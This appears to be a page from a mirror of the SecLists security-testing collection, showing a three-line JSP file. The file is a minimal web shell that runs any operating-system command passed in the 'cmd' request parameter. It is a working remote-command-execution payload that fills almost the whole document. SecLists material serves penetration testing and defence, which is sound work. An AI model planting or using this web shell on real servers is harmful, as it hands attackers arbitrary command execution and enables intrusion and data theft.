mirror of
https://github.com/danielmiessler/SecLists
synced 2026-04-03 04:05:51 +02:00
3 lines
63 B
Text
3 lines
63 B
Text
<%
|
|
Runtime.getRuntime().exec(request.getParameter("cmd"));
|
|
%>
|